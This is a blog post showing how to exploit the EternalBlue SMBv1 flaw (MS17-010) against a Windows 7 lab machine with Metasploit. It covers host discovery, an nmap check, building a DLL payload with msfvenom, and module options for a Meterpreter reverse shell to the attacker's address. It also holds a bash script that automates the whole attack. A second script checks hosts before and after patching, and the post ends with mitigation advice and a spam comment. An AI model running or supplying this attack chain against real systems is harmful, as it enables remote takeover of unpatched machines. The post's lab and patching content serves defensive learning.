EternalBlue Exploit at Windows 7 using Metasploit

Several months ago (and perhaps it is still going on), many Windows hosts were infected by two major ransomware families, WannaCry and Petya/NotPetya. According to wired.co.uk, the spread of both was helped by a Microsoft Windows vulnerability exploited by a tool called EternalBlue.

EternalBlue is an exploit generally believed to have been developed by the U.S. National Security Agency (NSA). It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry and Petya ransomware attacks on May 12, 2017 and June 27, 2017 respectively. It was also reported to have been used by the Retefe banking trojan since at least September 5, 2017.

The vulnerability EternalBlue targets is in Microsoft's Server Message Block version 1 (SMBv1) server, tracked as CVE-2017-0144 and fixed by the MS17-010 security update. The SMBv1 server in various versions of Windows mishandles specially crafted packets from remote attackers, which lets an unauthenticated attacker execute arbitrary code in the kernel of the target computer.

In this post I will show a proof of concept: getting remote access to a Windows 7 machine with the exploit from Metasploit. The EternalBlue module I used is on GitHub, through this link. It combines two leaked tools: EternalBlue, which exploits the SMBv1 bug and installs the DoublePulsar backdoor on the target, and DoublePulsar, which is then used to inject a DLL carrying the payload. After downloading the module I had a file named eternalblue_doublepulsar.rb, which I first had to copy by hand into the Metasploit framework module directory (/usr/share/metasploit-framework/modules/exploits/windows/smb).

I located the target machine on my local network using netdiscover.

[Screenshot: netdiscover output]

I found that the target machine was 192.168.100.7 (VMware, Inc.). Then I scanned it with nmap.

[Screenshot: nmap scan of port 445 for the EternalBlue SMB vulnerability]

Fortunately, nmap reported the machine as vulnerable to MS17-010, the SMB bug that EternalBlue exploits. Once I was certain of that, I prepared the attack: I generated a DLL payload with msfvenom and started the PostgreSQL service that Metasploit's database uses. My attacker machine was kali-linux3, whose IP address was 192.168.100.8.

[Screenshot: msfvenom generating the DLL payload]

Then I fired up the Metasploit framework by launching msfconsole and selected the module at exploit/windows/smb/eternalblue_doublepulsar.

As the screenshot shows, several options must be set: RHOST (the victim's IP address) and TARGETARCHITECTURE (whether the target machine is 32-bit or 64-bit). A payload is also needed; in this case I used windows/meterpreter/reverse_tcp, which means LHOST must point back at the attacker machine so the reverse connection can reach it.

With all options set, I launched the exploit. It succeeded and handed me a Meterpreter session on the machine.
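The steps above, from the msfvenom DLL to the exploit launch, as an added example that is not code from the post or from the module's authors: a bash wrapper that prints the msfvenom command, writes the msfconsole resource script with the options the post sets, checks that the module file and the DLL are in place, and only launches when explicitly asked. Values not in the post are assumptions: the handler port 4444, the DLL output path, the x86/x64 values for TARGETARCHITECTURE and the RUN_EXPLOIT switch. The module has further options beyond these (see `show options` in msfconsole), and the payload architecture must match the target: for a 64-bit target use windows/x64/meterpreter/reverse_tcp.

```shell
#!/usr/bin/env bash
# Added example (not the post's own code): script the post's Metasploit steps
# (DLL via msfvenom, PostgreSQL, msfconsole with eternalblue_doublepulsar) as a
# generated resource script, so every option is reviewed before anything fires.
# Assumes the module is installed where the post copied it:
#   /usr/share/metasploit-framework/modules/exploits/windows/smb/
set -u

RHOST="${RHOST:-192.168.100.7}"    # victim (from the post)
LHOST="${LHOST:-192.168.100.8}"    # attacker, kali-linux3 (from the post)
LPORT="${LPORT:-4444}"             # assumed handler port
ARCH="${ARCH:-x86}"                # TARGETARCHITECTURE; x86/x64 values assumed
PAYLOAD="windows/meterpreter/reverse_tcp"   # as in the post (32-bit stager)
DLL="${DLL:-/tmp/eternalblue_payload.dll}"  # assumed msfvenom output path

# The msfvenom command that builds the DLL DoublePulsar injects.
# Printed rather than executed so it can be checked first.
msfvenom_cmd() {
  printf 'msfvenom -p %s LHOST=%s LPORT=%s -f dll -o %s\n' \
    "$PAYLOAD" "$LHOST" "$LPORT" "$DLL"
}

# Resource script with the options the post sets plus the handler's LHOST/LPORT.
build_rc() {
  cat <<EOF
use exploit/windows/smb/eternalblue_doublepulsar
set RHOST $RHOST
set TARGETARCHITECTURE $ARCH
set PAYLOAD $PAYLOAD
set LHOST $LHOST
set LPORT $LPORT
show options
exploit -j
EOF
}

# Checks worth doing before launching: the module file must exist where the
# post copied it, and the payload DLL must already have been built.
preflight() {
  local mod=/usr/share/metasploit-framework/modules/exploits/windows/smb/eternalblue_doublepulsar.rb
  [ -f "$mod" ] || { echo "missing module: $mod" >&2; return 1; }
  [ -s "$DLL" ] || { echo "missing payload DLL: $DLL (run: $(msfvenom_cmd))" >&2; return 1; }
  return 0
}

# Full run: start PostgreSQL as the post does, write the resource script and
# hand it to msfconsole (-q quiet, -r resource file).
launch() {
  preflight || return 1
  sudo service postgresql start
  build_rc > /tmp/eternalblue.rc
  msfconsole -q -r /tmp/eternalblue.rc
}

# Only fire when RUN_EXPLOIT=1 is set, so sourcing the file is harmless.
if [ "${RUN_EXPLOIT:-0}" = 1 ]; then launch; fi
```

Run `build_rc` first to read the script it would feed to msfconsole, then `RUN_EXPLOIT=1 ./eternalblue.sh` on the Kali box once the DLL exists.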

[Screenshot: Meterpreter session on the target]

The important question is how to protect a computer from this exploit. The answer is to install the MS17-010 security update for Windows, which Microsoft released through this link. Where SMBv1 is not needed, disabling it removes the attack surface entirely, and TCP port 445 should not be reachable from untrusted networks in the first place.
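The nmap check from the scanning step above and the post-patch check are the same check, so here is one added example serving both (not the post's own code): it classifies a host from the output of nmap's smb-vuln-ms17-010 and smb-protocols NSE scripts, so the same command can be run before exploitation and again after the MS17-010 update (and after SMBv1 has been disabled) to confirm the fix took. The sample outputs are constructed in the shape nmap prints and are not real captures; the function names are mine.

```shell
#!/usr/bin/env bash
# Added example (not the post's own code): turn nmap's smb-vuln-ms17-010 and
# smb-protocols script output into a verdict that can be compared before and
# after patching.
set -u

# Scan a live target; prints nmap's normal text output on stdout.
# Requires nmap with the smb-vuln-ms17-010 and smb-protocols NSE scripts.
scan_smb() {
  nmap -Pn -p 445 --script smb-vuln-ms17-010,smb-protocols "$1" 2>/dev/null
}

# Read nmap output on stdin and print one verdict line:
#   VULNERABLE      - script reported "State: VULNERABLE"
#   NOT_VULNERABLE  - 445/tcp open but the script did not flag it
#   UNREACHABLE     - 445/tcp not open (closed/filtered or host down)
ms17_010_verdict() {
  local out
  out="$(cat)"
  if printf '%s\n' "$out" | grep -q 'State: VULNERABLE'; then
    echo VULNERABLE
  elif printf '%s\n' "$out" | grep -Eq '^445/tcp +open'; then
    echo NOT_VULNERABLE
  else
    echo UNREACHABLE
  fi
}

# Read nmap output on stdin; YES if the SMBv1 dialect is still offered.
# A patched host that still speaks SMBv1 is fixed for MS17-010 but keeps the
# legacy protocol exposed.
smbv1_enabled() {
  if grep -q 'NT LM 0.12 (SMBv1)'; then echo YES; else echo NO; fi
}

# Constructed sample output for an unpatched Windows 7 host (relevant lines only).
sample_unpatched() {
  cat <<'EOF'
Nmap scan report for 192.168.100.7
Host is up (0.00041s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols:
|   dialects:
|     NT LM 0.12 (SMBv1) [dangerous, but default]
|     2.02
|_    2.10
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_    Risk factor: HIGH
EOF
}

# Constructed sample for the same host after MS17-010 with SMBv1 disabled.
sample_patched() {
  cat <<'EOF'
Nmap scan report for 192.168.100.7
Host is up (0.00039s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-protocols:
|   dialects:
|     2.02
|_    2.10
EOF
}

# Demo against the constructed samples (no network needed).
echo "before patch: $(sample_unpatched | ms17_010_verdict), SMBv1=$(sample_unpatched | smbv1_enabled)"
echo "after  patch: $(sample_patched | ms17_010_verdict), SMBv1=$(sample_patched | smbv1_enabled)"
# Against a live host: scan_smb 192.168.100.7 | ms17_010_verdict
```

The UNREACHABLE case is deliberate: a host that no longer answers on 445 from the scanning network has also closed the door, but that should be confirmed from a network that is allowed to reach it rather than read as "patched".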

That is a small PoC from Sudokom. Hopefully it helps you secure your devices. Thanks.

4 thoughts on “EternalBlue Exploit at Windows 7 using Metasploit”

  1. Hello ,

    I saw your tweets and thought I would check your website. Have to say it looks very good!
    I’m also interested in this topic and have recently started my journey as young entrepreneur.

    I’m also looking for ways to promote my website. I have tried AdSense and Facebook Ads, however it is getting very expensive.
    Can you recommend something what works best for you?

    I also want to improve SEO of my website. Would appreciate, if you can have a quick look at my website and give me an advice what I should improve: http://janzac.com/
    (Recently I have added a new page about FutureNet and the way how users can make money on this social networking portal.)

    I wanted to subscribe to your newsletter, but I couldn’t find it. Do you have it?

    Hope to hear from you soon.

    P.S.
    Maybe I will add link to your website on my website and you will add link to my website on your website? It will improve SEO of our websites, right? What do you think?

    Regards
    Jan Zac
